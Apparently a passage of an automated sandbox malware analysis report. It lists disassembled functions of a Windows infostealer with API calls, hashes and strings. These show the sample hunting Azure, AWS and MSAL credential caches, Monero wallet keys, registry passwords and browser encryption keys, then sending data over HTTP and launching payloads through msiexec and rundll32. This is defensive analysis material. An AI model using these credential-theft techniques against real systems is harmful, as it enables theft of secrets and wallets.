                      • Associated: 00000000.00000002.1627546380.00000000013D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627786841.00000000013D9000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627895362.0000000001571000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627911280.0000000001572000.00000080.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_ee0000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: lstrcat$File$Findwsprintf$Path$CloseCopyDeleteFirstFolderMatchNextSpec
                      • String ID: *.*$*.*$Azure\.IdentityService$Azure\.aws$Azure\.azure$\.IdentityService\$\.aws\$\.azure\$msal.cache
                      • API String ID: 949356159-974132213
                      • Opcode ID: e1c389ceece71f50251384181427c38f592769c47c3be64d44edddbf5055a39c
                      • Instruction ID: 3bee1630c4f8590944354162279747bfe2335ffe09ea4f1a66ca6a50df3a8d7e
                      • Opcode Fuzzy Hash: e1c389ceece71f50251384181427c38f592769c47c3be64d44edddbf5055a39c
                      • Instruction Fuzzy Hash: FF4183BA94030867DB24F770EC47FED7678AF64700F0044A4B289660C1EEF59BD99B92
                      Function 00EF9010 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 184COMMON
                      Download Yara Rule
                      APIs
                      • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 00EF906C
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1627399781.0000000000EE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                      • Associated: 00000000.00000002.1627388243.0000000000EE0000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627399781.0000000000F91000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627399781.0000000000F9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627399781.0000000000FC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627399781.000000000112A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627546380.000000000113E000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627546380.00000000012C5000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627546380.000000000139F000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627546380.00000000013C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627546380.00000000013C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627546380.00000000013D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627786841.00000000013D9000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627895362.0000000001571000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627911280.0000000001572000.00000080.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_ee0000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: CreateGlobalStream
                      • String ID: image/jpeg
                      • API String ID: 2244384528-3785015651
                      • Opcode ID: 67f7723a1a040afb8c0a97609aa00a90f45f53b5efb2637d453d13de471266bd
                      • Instruction ID: bbb50a3eb6f36ac1686bbb2f0060e6a4f1647c80f2a490682ff54e885c0292b6
                      • Opcode Fuzzy Hash: 67f7723a1a040afb8c0a97609aa00a90f45f53b5efb2637d453d13de471266bd
                      • Instruction Fuzzy Hash: 1A710175910208FBDB28DFE4E889FEDB7B9BF48700F108518F616A7284DB74A945CB60
                      Function 00EF2E30 Relevance: 19.7, APIs: 3, Strings: 8, Instructions: 469COMMON
                      Download Yara Rule
                      APIs
                        • Part of subcall function 00EFA740: lstrcpy.KERNEL32(00F00E17,00000000), ref: 00EFA788
                      • ShellExecuteEx.SHELL32(0000003C), ref: 00EF31C5
                      • ShellExecuteEx.SHELL32(0000003C), ref: 00EF335D
                      • ShellExecuteEx.SHELL32(0000003C), ref: 00EF34EA
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1627399781.0000000000EE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                      • Associated: 00000000.00000002.1627388243.0000000000EE0000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627399781.0000000000F91000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627399781.0000000000F9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627399781.0000000000FC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627399781.000000000112A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627546380.000000000113E000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627546380.00000000012C5000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627546380.000000000139F000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627546380.00000000013C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627546380.00000000013C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627546380.00000000013D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627786841.00000000013D9000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627895362.0000000001571000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627911280.0000000001572000.00000080.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_ee0000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: ExecuteShell$lstrcpy
                      • String ID: /i "$ /passive$"" $.dll$.msi$<$C:\Windows\system32\msiexec.exe$C:\Windows\system32\rundll32.exe
                      • API String ID: 2507796910-3625054190
                      • Opcode ID: 550661f285626adb27c307e6d7b882bde1907d8c89c62a8eb31c1f89a9e98841
                      • Instruction ID: 952829830dca00f4791c9b7d6a55704bd746abc970877d0efa2602c2b10f40d7
                      • Opcode Fuzzy Hash: 550661f285626adb27c307e6d7b882bde1907d8c89c62a8eb31c1f89a9e98841
                      • Instruction Fuzzy Hash: 07121FB180010CAADB18EFA0DC56FFDB7B8AF54340F545179E60A7A095EF706B4ACB52
                      Function 00EF52C0 Relevance: 17.6, APIs: 5, Strings: 5, Instructions: 139stringCOMMON
                      Download Yara Rule
                      APIs
                        • Part of subcall function 00EFA7A0: lstrcpy.KERNEL32(?,00000000), ref: 00EFA7E6
                        • Part of subcall function 00EE6280: InternetOpenA.WININET(00F00DFE,00000001,00000000,00000000,00000000), ref: 00EE62E1
                        • Part of subcall function 00EE6280: StrCmpCA.SHLWAPI(?,0168E470), ref: 00EE6303
                        • Part of subcall function 00EE6280: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00EE6335
                        • Part of subcall function 00EE6280: HttpOpenRequestA.WININET(00000000,GET,?,0168DA40,00000000,00000000,00400100,00000000), ref: 00EE6385
                        • Part of subcall function 00EE6280: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 00EE63BF
                        • Part of subcall function 00EE6280: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00EE63D1
                        • Part of subcall function 00EFA8A0: lstrcpy.KERNEL32(?,00F00E17), ref: 00EFA905
                      • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00EF5318
                      • lstrlen.KERNEL32(00000000), ref: 00EF532F
                        • Part of subcall function 00EF8E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00EF8E52
                      • StrStrA.SHLWAPI(00000000,00000000), ref: 00EF5364
                      • lstrlen.KERNEL32(00000000), ref: 00EF5383
                      • lstrlen.KERNEL32(00000000), ref: 00EF53AE
                        • Part of subcall function 00EFA740: lstrcpy.KERNEL32(00F00E17,00000000), ref: 00EFA788
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1627399781.0000000000EE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                      • Associated: 00000000.00000002.1627388243.0000000000EE0000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627399781.0000000000F91000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627399781.0000000000F9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627399781.0000000000FC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627399781.000000000112A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627546380.000000000113E000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627546380.00000000012C5000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627546380.000000000139F000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627546380.00000000013C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627546380.00000000013C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627546380.00000000013D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627786841.00000000013D9000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627895362.0000000001571000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627911280.0000000001572000.00000080.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_ee0000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: Internetlstrcpylstrlen$HttpOpenRequest$AllocConnectLocalOptionSend
                      • String ID: ERROR$ERROR$ERROR$ERROR$ERROR
                      • API String ID: 3240024479-1526165396
                      • Opcode ID: 382f21812c7a21fef6e25d74e9fe4a07a97541997fd49cd552a6ba9da15632c2
                      • Instruction ID: b7c419538bb55e8cef45e4cf86fbdb4e3104145853aeb6a8b2520c39e0fc2a32
                      • Opcode Fuzzy Hash: 382f21812c7a21fef6e25d74e9fe4a07a97541997fd49cd552a6ba9da15632c2
                      • Instruction Fuzzy Hash: B1512EB191014C9BCB18FF60C996AFD77B8AF50340F549028FA0A7B591DF706B45DB62
                      Function 00EF12D0 Relevance: 16.8, APIs: 11, Instructions: 310COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000000.00000002.1627399781.0000000000EE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                      • Associated: 00000000.00000002.1627388243.0000000000EE0000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627399781.0000000000F91000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627399781.0000000000F9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627399781.0000000000FC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627399781.000000000112A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627546380.000000000113E000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627546380.00000000012C5000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627546380.000000000139F000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627546380.00000000013C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627546380.00000000013C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627546380.00000000013D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627786841.00000000013D9000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627895362.0000000001571000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627911280.0000000001572000.00000080.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_ee0000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: lstrcpylstrlen
                      • String ID:
                      • API String ID: 2001356338-0
                      • Opcode ID: bb94d4480768147623824e2e49cc0b15c0ede54d82dada9ee01646e440c81a26
                      • Instruction ID: 0f95517c5b491286563dc87161fab29e35e22ee92b69fb09f918e75c3d535f40
                      • Opcode Fuzzy Hash: bb94d4480768147623824e2e49cc0b15c0ede54d82dada9ee01646e440c81a26
                      • Instruction Fuzzy Hash: D9C185B590011DABCB28EF60DC89FFA73B8BF54304F0455E9E20E67141EA71AA95CF91
                      Function 00EF4280 Relevance: 16.7, APIs: 11, Instructions: 204stringCOMMON
                      Download Yara Rule
                      APIs
                        • Part of subcall function 00EF8DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00EF8E0B
                      • lstrcat.KERNEL32(?,00000000), ref: 00EF42EC
                      • lstrcat.KERNEL32(?,0168DFF8), ref: 00EF430B
                      • lstrcat.KERNEL32(?,?), ref: 00EF431F
                      • lstrcat.KERNEL32(?,0168C690), ref: 00EF4333
                        • Part of subcall function 00EFA740: lstrcpy.KERNEL32(00F00E17,00000000), ref: 00EFA788
                        • Part of subcall function 00EF8D90: GetFileAttributesA.KERNEL32(00000000,?,00EE1B54,?,?,00F0564C,?,?,00F00E1F), ref: 00EF8D9F
                        • Part of subcall function 00EE9CE0: StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 00EE9D39
                        • Part of subcall function 00EE99C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00EE99EC
                        • Part of subcall function 00EE99C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00EE9A11
                        • Part of subcall function 00EE99C0: LocalAlloc.KERNEL32(00000040,?), ref: 00EE9A31
                        • Part of subcall function 00EE99C0: ReadFile.KERNEL32(000000FF,?,00000000,00EE148F,00000000), ref: 00EE9A5A
                        • Part of subcall function 00EE99C0: LocalFree.KERNEL32(00EE148F), ref: 00EE9A90
                        • Part of subcall function 00EE99C0: CloseHandle.KERNEL32(000000FF), ref: 00EE9A9A
                        • Part of subcall function 00EF93C0: GlobalAlloc.KERNEL32(00000000,00EF43DD,00EF43DD), ref: 00EF93D3
                      • StrStrA.SHLWAPI(?,0168DEC0), ref: 00EF43F3
                      • GlobalFree.KERNEL32(?), ref: 00EF4512
                        • Part of subcall function 00EE9AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,N,00000000,00000000), ref: 00EE9AEF
                        • Part of subcall function 00EE9AC0: LocalAlloc.KERNEL32(00000040,?,?,?,00EE4EEE,00000000,?), ref: 00EE9B01
                        • Part of subcall function 00EE9AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,N,00000000,00000000), ref: 00EE9B2A
                        • Part of subcall function 00EE9AC0: LocalFree.KERNEL32(?,?,?,?,00EE4EEE,00000000,?), ref: 00EE9B3F
                      • lstrcat.KERNEL32(?,00000000), ref: 00EF44A3
                      • StrCmpCA.SHLWAPI(?,00F008D1), ref: 00EF44C0
                      • lstrcat.KERNEL32(00000000,00000000), ref: 00EF44D2
                      • lstrcat.KERNEL32(00000000,?), ref: 00EF44E5
                      • lstrcat.KERNEL32(00000000,00F00FB8), ref: 00EF44F4
                      Memory Dump Source
                      • Source File: 00000000.00000002.1627399781.0000000000EE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                      • Associated: 00000000.00000002.1627388243.0000000000EE0000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627399781.0000000000F91000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627399781.0000000000F9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627399781.0000000000FC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627399781.000000000112A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627546380.000000000113E000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627546380.00000000012C5000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627546380.000000000139F000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627546380.00000000013C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627546380.00000000013C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627546380.00000000013D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627786841.00000000013D9000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627895362.0000000001571000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627911280.0000000001572000.00000080.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_ee0000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: lstrcat$FileLocal$AllocFree$BinaryCryptGlobalString$AttributesCloseCreateFolderHandlePathReadSizelstrcpy
                      • String ID:
                      • API String ID: 3541710228-0
                      • Opcode ID: e831814ee10e0251e8c2353a40e4a99f744a63bf4d3c82b5805e0ebeb0c39c1c
                      • Instruction ID: e421a2fc3e99daf7c84824fb1df37da2a75c9eaa6acc33e69c0fe95f0440c8cd
                      • Opcode Fuzzy Hash: e831814ee10e0251e8c2353a40e4a99f744a63bf4d3c82b5805e0ebeb0c39c1c
                      • Instruction Fuzzy Hash: C27147B690020CB7CB24EBA0DC85FEE77B9AF88300F045598F619A7185EA74DB55CB91
                      Function 00EE1310 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 141stringfileCOMMON
                      Download Yara Rule
                      APIs
                        • Part of subcall function 00EE12A0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00EE12B4
                        • Part of subcall function 00EE12A0: RtlAllocateHeap.NTDLL(00000000), ref: 00EE12BB
                        • Part of subcall function 00EE12A0: RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 00EE12D7
                        • Part of subcall function 00EE12A0: RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,?,000000FF), ref: 00EE12F5
                        • Part of subcall function 00EE12A0: RegCloseKey.ADVAPI32(?), ref: 00EE12FF
                      • lstrcat.KERNEL32(?,00000000), ref: 00EE134F
                      • lstrlen.KERNEL32(?), ref: 00EE135C
                      • lstrcat.KERNEL32(?,.keys), ref: 00EE1377
                        • Part of subcall function 00EFA740: lstrcpy.KERNEL32(00F00E17,00000000), ref: 00EFA788
                        • Part of subcall function 00EFA9B0: lstrlen.KERNEL32(?,016888F8,?,\Monero\wallet.keys,00F00E17), ref: 00EFA9C5
                        • Part of subcall function 00EFA9B0: lstrcpy.KERNEL32(00000000), ref: 00EFAA04
                        • Part of subcall function 00EFA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00EFAA12
                        • Part of subcall function 00EFA8A0: lstrcpy.KERNEL32(?,00F00E17), ref: 00EFA905
                        • Part of subcall function 00EF8B60: GetSystemTime.KERNEL32(00F00E1A,0168C928,00F005AE,?,?,00EE13F9,?,0000001A,00F00E1A,00000000,?,016888F8,?,\Monero\wallet.keys,00F00E17), ref: 00EF8B86
                        • Part of subcall function 00EFA920: lstrcpy.KERNEL32(00000000,?), ref: 00EFA972
                        • Part of subcall function 00EFA920: lstrcat.KERNEL32(00000000), ref: 00EFA982
                      • CopyFileA.KERNEL32(?,00000000,00000001), ref: 00EE1465
                        • Part of subcall function 00EFA7A0: lstrcpy.KERNEL32(?,00000000), ref: 00EFA7E6
                        • Part of subcall function 00EE99C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00EE99EC
                        • Part of subcall function 00EE99C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00EE9A11
                        • Part of subcall function 00EE99C0: LocalAlloc.KERNEL32(00000040,?), ref: 00EE9A31
                        • Part of subcall function 00EE99C0: ReadFile.KERNEL32(000000FF,?,00000000,00EE148F,00000000), ref: 00EE9A5A
                        • Part of subcall function 00EE99C0: LocalFree.KERNEL32(00EE148F), ref: 00EE9A90
                        • Part of subcall function 00EE99C0: CloseHandle.KERNEL32(000000FF), ref: 00EE9A9A
                      • DeleteFileA.KERNEL32(00000000), ref: 00EE14EF
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1627399781.0000000000EE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                      • Associated: 00000000.00000002.1627388243.0000000000EE0000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627399781.0000000000F91000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627399781.0000000000F9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627399781.0000000000FC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627399781.000000000112A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627546380.000000000113E000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627546380.00000000012C5000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627546380.000000000139F000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627546380.00000000013C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627546380.00000000013C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627546380.00000000013D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627786841.00000000013D9000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627895362.0000000001571000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627911280.0000000001572000.00000080.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_ee0000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: Filelstrcpy$lstrcat$CloseHeapLocallstrlen$AllocAllocateCopyCreateDeleteFreeHandleOpenProcessQueryReadSizeSystemTimeValue
                      • String ID: .keys$SOFTWARE\monero-project\monero-core$\Monero\wallet.keys$wallet_path
                      • API String ID: 3478931302-218353709
                      • Opcode ID: 3db73696a35b5f96711ece0cc29553301bff731ae23b7cde04ffa41d4d50d4e1
                      • Instruction ID: e5a0b4dc9ee31b78d4dc98b05686d3c7ac16729d4ce4d8d3763a36962c9f94e9
                      • Opcode Fuzzy Hash: 3db73696a35b5f96711ece0cc29553301bff731ae23b7cde04ffa41d4d50d4e1
                      • Instruction Fuzzy Hash: 605131F191011D57CB29EB60DD96AFD73BCAF54300F4451B8B70A76082EE706B89CBA6
                      Function 00EE75D0 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 91stringCOMMON
                      Download Yara Rule
                      APIs
                        • Part of subcall function 00EE72D0: RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 00EE733A
                        • Part of subcall function 00EE72D0: RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 00EE73B1
                        • Part of subcall function 00EE72D0: StrStrA.SHLWAPI(00000000,Password,00000000), ref: 00EE740D
                        • Part of subcall function 00EE72D0: GetProcessHeap.KERNEL32(00000000,?), ref: 00EE7452
                        • Part of subcall function 00EE72D0: HeapFree.KERNEL32(00000000), ref: 00EE7459
                      • lstrcat.KERNEL32(00000000,00F017FC), ref: 00EE7606
                      • lstrcat.KERNEL32(00000000,00000000), ref: 00EE7648
                      • lstrcat.KERNEL32(00000000, : ), ref: 00EE765A
                      • lstrcat.KERNEL32(00000000,00000000), ref: 00EE768F
                      • lstrcat.KERNEL32(00000000,00F01804), ref: 00EE76A0
                      • lstrcat.KERNEL32(00000000,00000000), ref: 00EE76D3
                      • lstrcat.KERNEL32(00000000,00F01808), ref: 00EE76ED
                      • task.LIBCPMTD ref: 00EE76FB
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1627399781.0000000000EE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                      • Associated: 00000000.00000002.1627388243.0000000000EE0000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627399781.0000000000F91000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627399781.0000000000F9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627399781.0000000000FC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627399781.000000000112A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627546380.000000000113E000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627546380.00000000012C5000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627546380.000000000139F000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627546380.00000000013C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627546380.00000000013C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627546380.00000000013D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627786841.00000000013D9000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627895362.0000000001571000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627911280.0000000001572000.00000080.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_ee0000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: lstrcat$Heap$EnumFreeOpenProcessValuetask
                      • String ID: :
                      • API String ID: 2677904052-3653984579
                      • Opcode ID: 64827bc4bf517b33b797283991c6a0ad0a12c672f337575b2b49d89dc6d889dd
                      • Instruction ID: c0ccb7b8d1af69d2569df8388f2d4034123bc843f05cad55c5e6babf537f9538
                      • Opcode Fuzzy Hash: 64827bc4bf517b33b797283991c6a0ad0a12c672f337575b2b49d89dc6d889dd
                      • Instruction Fuzzy Hash: 0731387690014DEFCB2CEFA5EC85DFE77B8BF44302B105128E116B7284DA34A996DB51
                      Function 00EF8100 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 67memoryCOMMON
                      Download Yara Rule
                      APIs
                      • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00000000,00000000,?,0168DBD8,00000000,?,00F00E2C,00000000,?,00000000), ref: 00EF8130
                      • RtlAllocateHeap.NTDLL(00000000), ref: 00EF8137
                      • GlobalMemoryStatusEx.KERNEL32(00000040,00000040,00000000), ref: 00EF8158
                      • __aulldiv.LIBCMT ref: 00EF8172
                      • __aulldiv.LIBCMT ref: 00EF8180
                      • wsprintfA.USER32 ref: 00EF81AC
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1627399781.0000000000EE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                      • Associated: 00000000.00000002.1627388243.0000000000EE0000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627399781.0000000000F91000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627399781.0000000000F9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627399781.0000000000FC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627399781.000000000112A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627546380.000000000113E000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627546380.00000000012C5000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627546380.000000000139F000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627546380.00000000013C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627546380.00000000013C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627546380.00000000013D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627786841.00000000013D9000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627895362.0000000001571000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627911280.0000000001572000.00000080.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_ee0000_file.jbxd
                      Yara matches
                      Similarity
